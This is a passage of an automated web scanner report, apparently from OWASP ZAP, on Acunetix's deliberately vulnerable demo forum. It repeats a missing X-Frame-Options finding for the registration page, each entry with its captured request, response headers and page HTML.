deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=70 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=71 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=72 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=73 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=74 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=75 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=76 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=77 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p 